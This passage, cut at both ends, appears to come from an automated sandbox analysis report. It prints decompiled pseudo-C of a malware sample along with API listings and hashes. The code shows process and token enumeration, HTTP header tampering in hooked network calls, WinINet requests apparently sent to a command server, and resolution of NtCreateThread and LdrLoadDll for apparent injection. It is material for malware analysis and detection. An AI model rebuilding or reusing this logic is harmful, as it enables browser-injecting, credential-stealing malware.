    											_push(_t133);
    											__eflags = _t73;
    											if(_t73 != 0) {
    												_t74 = HeapReAlloc( *0x42e6d4, 8, _t73, ??);
    											} else {
    												_t74 = HeapAlloc( *0x42e6d4, 8, ??);
    											}
    											__eflags = _t74;
    											if(__eflags != 0) {
    												_v612 = _t74;
    												L41:
    												 *((intOrPtr*)(_t133 + _v612 - 8)) = _v564;
    												_v608 = _v608 + 1;
    												_v604 = _v604 + 1;
    												_v588 = _t133 + 4;
    												if(E00428190(_v564, _v584) != 0) {
    													_v613 = 1;
    												}
    											}
    											goto L43;
    										}
    										if(_t73 != 0) {
    											HeapFree( *0x42e6d4, _t116, _t73);
    										}
    										_v612 = 0;
    										goto L41;
    									}
    									_t135 =  *_t100;
    									_t127 =  *((intOrPtr*)( *0x42e8fc));
    									while(1) {
    										_t120 =  *((intOrPtr*)(_t135 + _t104));
    										_t81 =  *((intOrPtr*)(_t127 + _t104));
    										if(_t120 != _t81) {
    											break;
    										}
    										_t104 = _t104 + 1;
    										if(_t104 < _t140) {
    											continue;
    										}
    										goto L32;
    									}
    									__eflags = (_t120 & 0x000000ff) - (_t81 & 0x000000ff);
    									if(__eflags != 0) {
    										goto L43;
    									}
    									goto L32;
    								}
    								_t84 = _v600;
    								_t128 = _t84;
    								if(GetTokenInformation(_t84, 1, 0, 0,  &_v596) != 0 || GetLastError() != 0x7a) {
    									L20:
    									_t100 = 0;
    									goto L21;
    								} else {
    									_t88 = _v600;
    									if(_t88 == 0) {
    										goto L20;
    									}
    									_t136 = HeapAlloc( *0x42e6d4, 8, _t88 + 4);
    									if(_t136 == 0) {
    										goto L20;
    									}
    									if(GetTokenInformation(_t128, 1, _t136, _v600,  &_v600) == 0) {
    										_push(_t136);
    										_push(0);
    										_push( *0x42e6d4);
    										L19:
    										HeapFree();
    										goto L20;
    									}
    									_t100 = _t136;
    									_t95 = GetTokenInformation(_v608, 0xc,  &_v588, 4,  &_v584);
    									if(_t95 != 0) {
    										L21:
    										CloseHandle(_v604);
    										_t131 = _v612;
    										_t125 = _v616;
    										goto L22;
    									}
    									_push(_t136);
    									_push(_t95);
    									_push( *0x42e6d4);
    									goto L19;
    								}
    							}
    							while( *((intOrPtr*)(_t125 + _t62 * 4)) != _t102) {
    								_t62 = _t62 + 1;
    								_t151 = _t62 - _t131;
    								if(_t62 < _t131) {
    									continue;
    								}
    								goto L9;
    							}
    						}
    						L46:
    					} while (Process32NextW(_t98,  &_v572) != 0);
    					goto L47;
    				}
    				if(_t125 != 0) {
    					HeapFree( *0x42e6d4, 0, _t125);
    				}
    				return _v609;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00428255
    • Process32FirstW.KERNEL32 ref: 00428280
    • OpenProcess.KERNEL32(00000400,00000000,0000022C,0000022C,?,?,?,?,?,?,?,?,00000000,?), ref: 004282E3
    • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004282FD
    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042831B
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?), ref: 00428325
    • HeapAlloc.KERNEL32(?,00000008,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428345
    • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),00000000,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428365
    • GetTokenInformation.ADVAPI32(?,0000000C(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428384
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00428392
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042839F
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004283AE
    • GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004283CF
    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428439
    • HeapAlloc.KERNEL32(?,00000008,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428457
    • HeapReAlloc.KERNEL32(?,00000008,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00428469
    • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004284B7
    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?), ref: 004284CE
    • Process32NextW.KERNEL32(00000000,?), ref: 004284DA
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 004284E9
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00428507
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$CloseFreeHandleToken$AllocInformation$OpenProcessProcess32$CreateErrorFirstLastLengthNextSnapshotToolhelp32
    • String ID:
    • API String ID: 1383361078-0
    • Opcode ID: 6b1d318aa0451d2058ee99436b2bec713ca147e4bedfb882446048c1b6941006
    • Instruction ID: d53cd6147a2233de1c9c15b0ea736f2481f6e24e0a0d45c6e7292151b4372724
    • Opcode Fuzzy Hash: 6b1d318aa0451d2058ee99436b2bec713ca147e4bedfb882446048c1b6941006
    • Instruction Fuzzy Hash: 1D818F703053129FD724DF65ED84B2F77A8BB98744F80092DFA85E7260EB74E8058B5A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E00408900(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				intOrPtr _v36;
    				intOrPtr _v40;
    				void* _v44;
    				intOrPtr _v56;
    				void* _v60;
    				char _v76;
    				intOrPtr _v88;
    				char _v92;
    				intOrPtr _v96;
    				void* _v100;
    				signed char _v104;
    				signed char _v108;
    				void* _v112;
    				intOrPtr _v120;
    				intOrPtr _v124;
    				void* _v128;
    				void* _v148;
    				void* __esi;
    				long _t99;
    				long _t103;
    				signed int _t106;
    				intOrPtr _t107;
    				void* _t108;
    				signed int _t117;
    				intOrPtr _t123;
    				signed char _t127;
    				void* _t150;
    				void* _t152;
    				intOrPtr _t166;
    				signed int _t168;
    				signed char _t177;
    				signed int _t181;
    				intOrPtr _t185;
    				intOrPtr _t194;
    				intOrPtr _t198;
    				void* _t199;
    				void* _t207;
    				void* _t209;
    				signed int _t213;
    				signed int _t222;
    				intOrPtr _t234;
    				signed int _t238;
    				void* _t240;
    
    				_t240 = (_t238 & 0xfffffff8) - 0x5c;
    				_t99 = WaitForSingleObject( *0x42edbc, 0);
    				_t166 = _a12;
    				if(_t99 == 0 || _a8 == 0 || _t166 <= 0) {
    					L9:
    					return  *0x42d3b4(_a4, _a8, _t166);
    				} else {
    					EnterCriticalSection(0x42d3c4);
    					_t222 = E00407350(_a4);
    					if(_t222 == 0xffffffff) {
    						L8:
    						LeaveCriticalSection(0x42d3c4);
    						goto L9;
    					} else {
    						_t194 =  *0x42d3e0; // 0x0
    						_t181 = _t222 * 8 - _t222;
    						_t207 = _t194 + _t181 * 8;
    						if( *((intOrPtr*)(_t194 + 0x20 + _t181 * 8)) > 0) {
    							L30:
    							_t103 =  *(_t207 + 0x24);
    							_t209 =  *((intOrPtr*)(_t207 + 0x20)) - _t103;
    							LeaveCriticalSection(0x42d3c4);
    							_t168 =  *0x42d3b4(_a4,  *((intOrPtr*)(_t207 + 0x1c)) + _t103, _t209);
    							if(_t168 == 0xffffffff) {
    								L36:
    								return _t168;
    							} else {
    								EnterCriticalSection(0x42d3c4);
    								_t106 = E00407350(_a4);
    								if(_t106 != 0xffffffff) {
    									_t107 =  *0x42d3e0; // 0x0
    									_t108 = _t107 + (_t106 * 8 - _t106) * 8;
    									if(_t168 != _t209) {
    										 *((intOrPtr*)(_t108 + 0x24)) =  *((intOrPtr*)(_t108 + 0x24)) + _t168;
    										 *((intOrPtr*)(_t108 + 0x28)) =  *((intOrPtr*)(_t108 + 0x28)) - 1;
    										_t168 = 1;
    										LeaveCriticalSection(0x42d3c4);
    										goto L36;
    									} else {
    										_t82 = _t108 + 0x1c; // 0x1c
    										E00410870(E004107C0( *_t82), _t82, 0, 0x10);
    										LeaveCriticalSection(0x42d3c4);
    										return  *((intOrPtr*)(_t108 + 0x28));
    									}
    								} else {
    									 *0x42d3c0(0xffffe890, 8);
    									LeaveCriticalSection(0x42d3c4);
    									return _t168 | _t106;
    								}
    							}
    						} else {
    							if( *((intOrPtr*)(_t207 + 8)) > 0) {
    								L39:
    								LeaveCriticalSection(0x42d3c4);
    								_t230 = _a4;
    								_t213 =  *0x42d3b4(_a4, _a8, _t166);
    								if(_t213 == 0xffffffff) {
    									L45:
    									return _t213;
    								} else {
    									EnterCriticalSection(0x42d3c4);
    									_t117 = E00407350(_t230);
    									if(_t117 != 0xffffffff) {
    										_t198 =  *0x42d3e0; // 0x0
    										_t199 = _t198 + (_t117 * 8 - _t117) * 8;
    										_t185 =  *((intOrPtr*)(_t199 + 8));
    										if(_t213 > _t185) {
    											E00407480(_t117);
    											LeaveCriticalSection(0x42d3c4);
    											goto L45;
    										} else {
    											 *((intOrPtr*)(_t199 + 8)) = _t185 - _t213;
    											LeaveCriticalSection(0x42d3c4);
    											return _t213;
    										}
    									} else {
    										 *0x42d3c0(0xffffe890, 8);
    										LeaveCriticalSection(0x42d3c4);
    										return _t213 | _t117;
    									}
    								}
    							} else {
    								_push(_t166);
    								_push(_a8);
    								_push(_a4);
    								_push( &_v76);
    								_t123 = E004079C0();
    								_v96 = _t123;
    								if(_t123 != 0xffffffff) {
    									if(_v88 == 0) {
    										L38:
    										E00425BD0( &_v92);
    										 *((intOrPtr*)(_t207 + 8)) = _v96 + _t166;
    										goto L39;
    									} else {
    										_push( &_v92);
    										_t127 = E00424ED0();
    										_v104 = _t127;
    										if((_t127 & 0x00000001) == 0) {
    											_t177 = 0;
    											_v104 = 0;
    											_v108 = 0;
    											if((_t127 & 0x00000002) != 0) {
    												_t177 = E00410840(_a12, _a8);
    												_v108 = _t177;
    												if(_t177 != 0) {
    													E00425CF0( *((intOrPtr*)(_t207 + 0x10)),  *((intOrPtr*)(_t207 + 0xc)));
    													E004107C0( *((intOrPtr*)(_t207 + 0x14)));
    													E004107C0( *((intOrPtr*)(_t207 + 4)));
    													 *((intOrPtr*)(_t207 + 4)) = E00410E10( *((intOrPtr*)(_t240 + 0x2c)), _v88);
    													 *((intOrPtr*)(_t207 + 0x14)) = 0;
    													 *((intOrPtr*)(_t207 + 0x18)) = 0;
    													 *((intOrPtr*)(_t207 + 0xc)) = _v40;
    													 *((intOrPtr*)(_t207 + 0x10)) = _v36;
    													_t150 = E00417BB0(_t177, _a12, "Accept-Encoding", "identity");
    													_push("TE");
    													_push(_t150);
    													_t152 = E00417B00(_t177);
    													_push("If-Modified-Since");
    													_push(_t152);
    													 *((intOrPtr*)(_t240 + 0x10)) = E00417B00(_t177);
    												} else {
    													E00425CF0( *((intOrPtr*)(_t240 + 0x5c)), _v36);
    												}
    												_t127 =  *(_t240 + 0x18);
    											}
    											if((_t127 & 0x00000004) == 0) {
    												L28:
    												if(_t177 == 0) {
    													goto L37;
    												} else {
    													E00425BD0( &_v92);
    													 *((intOrPtr*)(_t207 + 8)) = _v96;
    													 *((intOrPtr*)(_t207 + 0x1c)) = _t177;
    													 *((intOrPtr*)(_t207 + 0x20)) = _v108;
    													 *(_t207 + 0x24) = 0;
    													 *((intOrPtr*)(_t207 + 0x28)) = _a12;
    													goto L30;
    												}
    											} else {
    												if(_t177 != 0) {
    													_t234 = _v108;
    												} else {
    													_t177 = _a8;
    													_t234 = _a12;
    												}
    												_push( &_v104);
    												_push( *((intOrPtr*)(_t240 + 0x48)));
    												_push(_v56);
    												_push(_t177);
    												_v124 = E00407EF0(_t234);
    												E004107C0( *((intOrPtr*)(_t240 + 0x44)));
    												if(_v124 != 0) {
    													if(_t177 != _a8) {
    														E004107C0(_t177);
    													}
    													_t177 = _v120;
    													goto L28;
    												} else {
    													if(_t177 == _a8) {
    														L37:
    														_t166 = _a12;
    														goto L38;
    													} else {
    														_v124 = _t234;
    														goto L28;
    													}
    												}
    											}
    										} else {
    											E00425BD0( &_v92);
    											LeaveCriticalSection(0x42d3c4);
    											return  *0x42d3c0(0xffffe8a3, 0) | 0xffffffff;
    										}
    									}
    								} else {
    									E00407480(_t222);
    									E00425BD0( &_v92);
    									goto L8;
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • WaitForSingleObject.KERNEL32(?,00000000), ref: 00408914
    • EnterCriticalSection.KERNEL32(0042D3C4), ref: 00408934
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 004089A1
    • LeaveCriticalSection.KERNEL32(0042D3C4,?), ref: 004089EB
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408B5A
    • EnterCriticalSection.KERNEL32(0042D3C4), ref: 00408B7F
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408BA9
    • LeaveCriticalSection.KERNEL32(0042D3C4,0000001C,00000000,00000010), ref: 00408BE9
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408C08
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408C31
    • EnterCriticalSection.KERNEL32(0042D3C4), ref: 00408C55
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408C7C
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408CAE
      • Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,?,00000000,00000000,?,00408CC2), ref: 004074B2
      • Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074D1
      • Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074E3
      • Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,?,?,00000000,00000000,?,00408CC2), ref: 004074F6
      • Part of subcall function 00407480: HeapFree.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,00408CC2), ref: 00407537
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BEA
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425BFD
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C10
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C22
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C35
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C48
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C5A
      • Part of subcall function 00425BD0: HeapFree.KERNEL32(?,00000000,?,?,00000000,00408C23), ref: 00425C6D
    • LeaveCriticalSection.KERNEL32(0042D3C4), ref: 00408CC7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalFreeHeapSection$Leave$Enter$ObjectSingleWait
    • String ID: Accept-Encoding$If-Modified-Since$identity
    • API String ID: 3946292479-3034467039
    • Opcode ID: c1540eb87958708ef49b76d53a9854f270b9bac68f2a3b10e1edae5f33efc1d7
    • Instruction ID: 0076ac7cbacc61c6bf87f49f3880dc39d7510c5281afac7c8dfc8ac8d80b0722
    • Opcode Fuzzy Hash: c1540eb87958708ef49b76d53a9854f270b9bac68f2a3b10e1edae5f33efc1d7
    • Instruction Fuzzy Hash: 13B1C0717043059FC710EF69E985A5AB7A0FF84324F10463EFC58A72A0DB78E855CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00425D90(intOrPtr* _a4) {
    				intOrPtr* _v80;
    				intOrPtr _v120;
    				char _v528;
    				short _v536;
    				void* _v544;
    				char* _v548;
    				void* _v552;
    				void* _v564;
    				char _v566;
    				char _v568;
    				char _v572;
    				char* _v576;
    				char _v592;
    				char _v600;
    				void* _v620;
    				char* _v624;
    				char _v632;
    				long _v640;
    				void _v644;
    				char _v652;
    				char _v660;
    				intOrPtr _v664;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t54;
    				void* _t55;
    				intOrPtr _t61;
    				intOrPtr _t69;
    				void* _t73;
    				void* _t94;
    				void* _t98;
    				char* _t101;
    				void* _t120;
    				signed int _t123;
    				void* _t125;
    				void* _t128;
    				intOrPtr* _t130;
    				void** _t132;
    
    				_t132 =  &_v544;
    				_t130 = _a4;
    				if(E004173A0( &_v528, _a4) == 0) {
    					L30:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t120 = InternetOpenA( *0x42eb6c, 0, 0, 0, 0);
    					_v552 = _t120;
    					if(_t120 == 0) {
    						L26:
    						_t54 = _v548;
    						__eflags = _t54;
    						if(_t54 != 0) {
    							HeapFree( *0x42e6d4, 0, _t54);
    						}
    						_t55 = _v544;
    						__eflags = _t55;
    						if(_t55 != 0) {
    							HeapFree( *0x42e6d4, 0, _t55);
    						}
    						goto L30;
    					} else {
    						_t125 = InternetConnectA(_t120, _v548, _v536, 0, 0, 3, 0, 0);
    						_v564 = _t125;
    						if(_t125 == 0) {
    							L25:
    							InternetCloseHandle(_t120);
    							goto L26;
    						} else {
    							_t61 =  *_t130;
    							_t101 = "POST";
    							if( *((char*)(_t61 + 0x18)) != 1) {
    								_t101 = "GET";
    							}
    							_t98 = HttpOpenRequestA(_t125, _t101, _v576, "HTTP/1.1",  *(_t61 + 8), 0, (0 | _v566 != 0x00000002) - 0x00000001 & 0x00800000 | 0x8404f700, 0);
    							if(_t98 == 0) {
    								L24:
    								InternetCloseHandle(_t125);
    								goto L25;
    							} else {
    								E0041D1B0( &_v572);
    								E004240C0(0xe,  &_v592);
    								_t69 =  *_t130;
    								_t140 =  *((intOrPtr*)(_t69 + 0x20));
    								if( *((intOrPtr*)(_t69 + 0x20)) > 0) {
    									_t94 = E00411E70(_t140,  &_v624,  &_v592,  *((intOrPtr*)(_t69 + 0x1c)));
    									_t132 =  &(_t132[3]);
    									if(_t94 > 0) {
    										HttpAddRequestHeadersA(_t98, _v624, 0xffffffff, 0xa0000000);
    										E004107C0(_v624);
    									}
    								}
    								E004240C0(0xf,  &_v592);
    								_t123 = 0;
    								if(_v568 != 0) {
    									do {
    										_t123 = _t123 + 1;
    									} while ( *((short*)(_t132 + 0x4c + _t123 * 2)) != 0);
    								}
    								_t73 = _t123 + _t123 * 2 + _t123 + _t123 * 2 + 2;
    								if(_t73 != 0) {
    									_t128 = HeapAlloc( *0x42e6d4, 8, _t73 + 4);
    									_t145 = _t128;
    									if(_t128 != 0) {
    										E00417890(_t128,  &_v568, _t123);
    										if(E00411E70(_t145,  &_v632,  &_v600, _t128) > 0) {
    											HttpAddRequestHeadersA(_t98, _v624, 0xffffffff, 0xa0000000);
    											E004107C0(_v624);
    										}
    										HeapFree( *0x42e6d4, 0, _t128);
    									}
    								}
    								if(HttpSendRequestA(_t98, 0, 0,  *( *_v80 + 0x24),  *( *_v80 + 0x28)) != 1) {
    									L23:
    									InternetCloseHandle(_t98);
    									_t125 = _v620;
    									_t120 = _v640;
    									goto L24;
    								} else {
    									_v640 = 4;
    									_v644 = 0;
    									if(HttpQueryInfoA(_t98, 0x20000013,  &_v644,  &_v640, 0) != 1 || _v664 != 0xc8) {
    										goto L23;
    									} else {
    										if(E004136E0(_t98,  &_v660) != 0) {
    											E004107C0(_t79);
    										}
    										E00417530( &_v652);
    										 *(_v120 + 8) = _t98;
    										return 0;
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
      • Part of subcall function 004173A0: InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7
    • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 00425DC3
    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00425DEC
    • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,?,00000000,-00000001,00000000), ref: 00425E3F
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00425E9A
    • HeapAlloc.KERNEL32(?,00000008,?), ref: 00425EE0
    • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 00425F1B
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00425F2E
    • HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00425F4A
    • HttpQueryInfoA.WININET(00000000,20000013,?,?,00000000), ref: 00425F77
      • Part of subcall function 004136E0: InternetQueryOptionA.WININET(00000000,00000022,00000000,?), ref: 004136F4
      • Part of subcall function 004136E0: GetLastError.KERNEL32(?,00000000,0040B7E5), ref: 004136FE
      • Part of subcall function 004136E0: HeapAlloc.KERNEL32(?,00000008,-00000004,?,00000000,0040B7E5), ref: 0041371B
      • Part of subcall function 004136E0: InternetQueryOptionA.WININET(00000000,00000022,00000000,?), ref: 0041372C
      • Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD
    • InternetCloseHandle.WININET(00000000), ref: 00425FC1
    • InternetCloseHandle.WININET(00000000), ref: 00425FD0
    • InternetCloseHandle.WININET(00000000), ref: 00425FD7
    • HeapFree.KERNEL32(?,00000000,?), ref: 00425FEE
    • HeapFree.KERNEL32(?,00000000,?), ref: 00426006
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Internet$Heap$Http$FreeRequest$CloseHandleQuery$AllocHeadersOpenOption$ConnectCrackErrorInfoLastSend
    • String ID: GET$HTTP/1.1$POST
    • API String ID: 3623753306-2753618334
    • Opcode ID: c97b695baf25488d8c4dd60bfe1713d967ab93b3ea14019e6f04ea9bc510bee6
    • Instruction ID: c9e906b204ff3371f9fd87185936f173b1b8c4aaaa8d1fb2663e22d1bdc92c86
    • Opcode Fuzzy Hash: c97b695baf25488d8c4dd60bfe1713d967ab93b3ea14019e6f04ea9bc510bee6
    • Instruction Fuzzy Hash: C471C271204311AFD320DB61ED85F5BB3E9EB88704F41452AFA04A72A1DB78ED05CBA9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 92%
    			E0041C530(signed char _a4) {
    				char _v28;
    				void* __ebx;
    				void* __esi;
    				void* _t8;
    				struct HINSTANCE__* _t11;
    				_Unknown_base(*)()* _t19;
    				struct HINSTANCE__* _t21;
    				intOrPtr _t24;
    				WCHAR* _t38;
    
    				_t24 = E0041C4F0();
    				 *0x42e910 = _t24;
    				if(_t24 != 0) {
    					if((_a4 & 0x00000001) != 0) {
    						_push(E0041C420(_t24, "GetProcAddress"));
    						_push(E0041C420(_t24, "LoadLibraryA"));
    						_t8 = E004172A0( *0x42e90c);
    						if(_t8 != 0) {
    							goto L7;
    						} else {
    							return _t8;
    						}
    					} else {
    						_t21 = GetModuleHandleW(0);
    						 *0x42e90c = _t21;
    						if(_t21 != 0) {
    							L7:
    							_t38 =  &_v28;
    							E00424100(0xe5, _t38);
    							_t11 = GetModuleHandleW(_t38);
    							 *0x42e914 = _t11;
    							if(_t11 == 0) {
    								L14:
    								return 0;
    							} else {
    								 *0x42e918 = GetProcAddress(_t11, "NtCreateThread");
    								 *0x42e91c = GetProcAddress( *0x42e914, "NtCreateUserProcess");
    								 *0x42e920 = GetProcAddress( *0x42e914, "NtQueryInformationProcess");
    								 *0x42e924 = GetProcAddress( *0x42e914, "RtlUserThreadStart");
    								 *0x42e928 = GetProcAddress( *0x42e914, "LdrLoadDll");
    								_t19 = GetProcAddress( *0x42e914, "LdrGetDllHandle");
    								 *0x42e92c = _t19;
    								if( *0x42e918 != 0 ||  *0x42e91c != 0) {
    									if( *0x42e920 == 0 ||  *0x42e928 == 0 || _t19 == 0) {
    										goto L14;
    									} else {
    										return 1;
    									}
    								} else {
    									goto L14;
    								}
    							}
    						} else {
    							return 0;
    						}
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(00000000), ref: 0041C55E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: HandleModule
    • String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
    • API String ID: 4139908857-305303173
    • Opcode ID: f8214c2a06dd41b64f0d2b381970b00a58f68758d368a6ac1c2d67a1f0dc7bcd
    • Instruction ID: a5a2b0398250d1a2c0576c257951e2c622ad2994320102ed4298f7cda69fd4da
    • Opcode Fuzzy Hash: f8214c2a06dd41b64f0d2b381970b00a58f68758d368a6ac1c2d67a1f0dc7bcd
    • Instruction Fuzzy Hash: 4031E6F174131066CB709F6BAC81B977B98A798714F90403BE90093261D67DA6C6CFAD
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E0040CEE0(void* __ecx, void* __edx, void* _a4) {
    				signed short _v204;
    				signed short _v216;
    				char _v676;
    				char _v804;
    				char _v1068;
    				short _v1588;
    				void* _v1592;
    				long _v1596;
    				void* _v1600;
    				void* _v1604;
    				intOrPtr _v1608;
    				intOrPtr _v1612;
    				void* _v1616;
    				long _v1620;
    				void* _v1624;
    				long _v1628;
    				long _v1632;
    				void* _v1633;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				long _t59;
    				void* _t65;
    				signed int _t67;
    				void* _t71;
    				long _t78;
    				long _t79;
    				void* _t83;
    				void* _t85;
    				void* _t91;
    				signed int _t94;
    				void* _t96;
    				void* _t97;
    				long _t98;
    				void* _t101;
    				void* _t102;
    				signed char _t104;
    				void* _t105;
    				void* _t108;
    				void* _t116;
    				void* _t119;
    				signed short _t126;
    				signed int _t127;
    				signed short _t134;
    				WCHAR* _t145;
    				signed int _t155;
    				void* _t157;
    
    				_t157 = (_t155 & 0xfffffff8) - 0x664;
    				_t116 = _a4;
    				_t59 = E0041CDD0( *_t116, (0 |  *_t116 != 0x00000000) + 0x78d0c214, 2);
    				_t151 = _t59;
    				_v1632 = _t151;
    				if(_t151 != 0) {
    					_v1600 =  &_v1068;
    					_v1612 = E0040CB50;
    					_v1608 = E0040CDA0;
    					_v1604 =  *0x42edbc;
    					_v1592 = _t116;
    					E0041D150( &_v804);
    					E00410820( &_v1068,  &_v676, 0x102);
    					_t65 =  *_t116 & 0x000000ff;
    					__eflags = _t65;
    					if(_t65 == 0) {
    						_t126 = _v216;
    						_t67 = _t126 >> 0x10;
    						_t127 = _t126 & 0x0000ffff;
    					} else {
    						__eflags = _t65 != 1;
    						if(_t65 != 1) {
    							_t67 = _v1628;
    							_t127 = _v1632;
    						} else {
    							_t134 = _v204;
    							_t67 = _t134 >> 0x10;
    							_t127 = _t134 & 0x0000ffff;
    						}
    					}
    					_v1628 = _t67 * 0xea60;
    					_v1632 = _t127 * 0xea60;
    					E00410870( &_v804,  &_v804, 0, 0x31c);
    					_t139 =  *0x42edbc;
    					_v1600 = 0;
    					_t71 = WaitForSingleObject(_t139, 0);
    					__eflags = _t71;
    					if(_t71 != 0) {
    						do {
    							__eflags =  *_t116;
    							_v1633 = 1;
    							if( *_t116 != 0) {
    								L22:
    								_t151 = E00423A90();
    								__eflags = _t151;
    								if(_t151 == 0) {
    									goto L42;
    								} else {
    									_v1620 = 0;
    									_t97 = E00418BD0(0x4e23, 0x10000000, _t151);
    									__eflags = _t97;
    									if(_t97 == 0) {
    										_t98 = _v1620;
    									} else {
    										_t98 = E00418C20(_t97);
    									}
    									_v1616 = _t98;
    									HeapFree( *0x42e6d4, 0, _t151);
    									__eflags = _v1616;
    									if(_v1616 == 0) {
    										L41:
    										_t116 = _a4;
    										goto L42;
    									} else {
    										_v1596 = 0;
    										_t101 = E0040C730(_t139,  &_v1596, 1);
    										__eflags = _t101;
    										if(_t101 == 0) {
    											_t119 = _v1633;
    										} else {
    											_t151 = _a4 + 8;
    											_push( &_v1616);
    											 *_t151 = 0xffffffff;
    											_t104 = E0040D4A0();
    											asm("sbb bl, bl");
    											_t119 = ( ~_t104 & 0x000000fe) + 2;
    											__eflags = _t151;
    											if(_t151 != 0) {
    												_t108 =  *_t151;
    												__eflags = _t108 - 0xffffffff;
    												if(_t108 != 0xffffffff) {
    													FlushFileBuffers(_t108);
    													CloseHandle( *_t151);
    													 *_t151 = 0xffffffff;
    												}
    											}
